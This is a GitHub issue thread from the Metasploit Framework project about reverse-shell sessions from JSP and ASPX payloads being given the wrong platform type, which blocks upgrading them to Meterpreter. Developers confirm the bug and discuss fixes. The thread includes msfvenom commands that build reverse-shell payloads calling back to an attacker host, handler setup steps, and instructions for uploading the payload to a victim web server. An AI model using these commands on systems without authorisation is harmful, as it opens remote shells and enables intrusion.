search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.72k stars 13.89k forks source link

Using java/jsp_shell_reverse_tcp with exploit/multi/handler results in a Windows shell with the wrong "shell type" #14827

Open ShawnDEvans opened 3 years ago

ShawnDEvans commented 3 years ago

Steps to reproduce

How'd you do it?

Set up the 'sploit handler:

  1. use exploit/multi/handler
  2. set PAYLOAD java/jsp_shell_reverse_tcp
  3. set LHOST my.host
  4. set ExitOnSession false
  5. set SHELL cmd.exe
  6. exploit -j -z

Create the payload: $ msfvenom -p java/jsp_shell_reverse_tcp LHOST=my.host LPORT=4444 -f raw > shell.jsp

Upload the payload to the victim web server, and access the script with 'curl' to execute server side.

Expected behavior

What should happen? I should get a shell, and the shell type should be "shell window"

Current behavior

I get a shell! However, the shell is not designated as the correct shell type. See detailed output below:

Session ID: 21 Name: Type: shell linux <--- THIS GUY IS WRONG Info: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. Tunnel: my.host:4444 -> victim.host:51725 (victim.host.ip) Via: exploit/multi/handler Encrypted: No UUID: CheckIn: Registered: No

What happens instead? The shell type should be "shell windows" not "shell linux". The "info" section is a bit of a dead giveaway. The incorrect shell attribute results in an inability to upgrade the generic shell to a Meterpreter session.

Metasploit version

msf6 exploit(multi/handler) > version Framework: 6.0.29-dev Console : 6.0.29-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outisde msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/ui/console] ActiveModule=exploit/multi/handler [multi/handler] PAYLOAD=java/jsp_shell_reverse_tcp WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false ExitOnSession=false ListenerTimeout=0 LHOST=203.100.10.219 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PLATFORM= ARCH= SHELL=cmd.exe CreateSession=true InitialAutoRunScript= AutoRunScript= CommandShellCleanupCommand= target=0 loglevel=3 ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 518 sessions -u 1 519 show options 520 info 521 set SHELL '' 522 show options 523 sessions -l 524 show options 525 info 526 show options advanced 527 set target 1 528 info 529 show options 530 sessions -i 531 sessions -l 532 sessions -i 1 533 sessions -i 534 jobs 535 search handler 536 show options 537 asdf 538 info 539 sessoins -i 540 sessions -i 541 sessions -h 542 sessions -v 543 history 544 info 545 show options 546 sessions -v 547 version 548 set loglevel 3 549 debug 550 jobs 551 jobs -K 552 show options 553 set SHELL cmd.exe 554 exploit -j -z 555 jobs 556 set TARGET 0 557 exploit -j -z 558 jobs 559 debug 560 essions 561 sessions 563 show options 564 info 565 show options advanced 566 info 567 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [02/11/2021 20:30:28] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:45:01] [e(0)] core: Exploit failed (multi/handler) - Rex::ArgumentError An invalid argument was specified. Invalid target index. [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [02/11/2021 16:09:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:09:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:09:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 16:09:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 16:40:30] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:40:30] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:40:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 16:40:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 16:42:14] [e(0)] core: Failed to connect to the database: No database YAML file [02/11/2021 16:42:21] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:42:21] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 16:42:21] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 16:42:21] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 18:05:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:05:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:05:32] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 18:05:32] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 18:07:09] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4443). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4443). [02/11/2021 18:07:37] [e(0)] core: Failed to connect to the database: No database YAML file [02/11/2021 18:07:44] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:07:44] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:07:44] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 18:07:44] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 18:27:01] [e(0)] core: Failed to connect to the database: No database YAML file [02/11/2021 18:27:08] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:27:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 18:27:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 18:27:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 18:30:08] [e(0)] core: Error running against host 203.100.6.120 - Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB) [02/11/2021 20:13:45] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:13:45] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:13:45] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:13:45] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:28:06] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:28:06] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:28:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:28:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:30:28] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:30:28] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:30:28] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:30:28] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:45:01] [e(0)] core: Exploit failed (multi/handler) - Rex::ArgumentError An invalid argument was specified. Invalid target index. [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:46:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [02/11/2021 20:48:39] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.29-dev Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [aarch64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
yzddmr6 commented 3 years ago

I mentioned this problem two years ago, but it hasn't been fixed

11829

adfoster-r7 commented 3 years ago

Confirmed

Now view the session details:

msf6 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: shell linux <-- Wrong
        Info: Microsoft Windows [Version 10.0.18363.1379] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\a\Downloads\apache-tomcat-10.0.4-windows-x64\apache-tomcat-10.0.4\bin>
      Tunnel: host:4444 -> remote:50477 (remote)
         Via: exploit/multi/handler
   Encrypted: No
        UUID: 
     CheckIn: <none>
  Registered: No

Also verified that sessions -u 1 doesn't work:

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1

[-] Shells on the target platform, linux, cannot be upgraded to Meterpreter at this time.
sempervictus commented 3 years ago

This was discussed briefly @ the last hackathon, but the problem lies in the disambiguation of plaform from runtime - we treat Java like we treat Windows, when what we should be doing is "comprehending" JVM on Win vs Ruby on BSD and so on.

timwr commented 3 years ago

Fixing Type: shell linux on sessions -v is a bit fiddly, but just fixing sessions -u so that it detects the platform should be easier

adfoster-r7 commented 3 years ago

Haven't looked into it further; But I believe this might be the same issue as shell_reverse_tcp sessions creaed via aspx payload, which are incorrectly treated as bsd shells.

Payload:

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.19" LPORT=4444 -f aspx > shell.aspx

Session information:

msf5 exploit(multi/handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: shell bsd
        Info: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:\windows\system32\inetsrv>
      Tunnel: 10.10.14.24:4444 -> 10.10.10.5:49187 (10.10.10.5)
         Via: exploit/multi/handler
   Encrypted: false
        UUID: 
     CheckIn: <none>
  Registered: No

Annoyingly it stops me from running shell_to_meterpreter as well:

msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Shells on the target platform, bsd, cannot be upgraded to Meterpreter at this time.
sempervictus commented 3 years ago

I'll resurrect part of the discussion around the underlying problem here: we need stratification between OS and runtime so that the shell is windows and the platform is java. There are dark days ahead for anyone doing that work because it requires untangling the handler code - something we have looked at but never undertaken as a community.

timwr commented 3 years ago

So we already have AutoVerifySession enabled by default for shells. We could consider a new option, off by default, called AutoVerifySessionType that attempts to confirm ( and update) the session platform. We then have that option on by default for java/jsp_shell_reverse_tcp (and potentially payload/generic/shell_reverse_tcp) payloads?

sempervictus commented 3 years ago

@timwr: you dirty dirty hacker :-p. That said, i can't poke any functional holes in it to be honest - since there's a mess underneath, the Ruby way is to plaster over it up-top.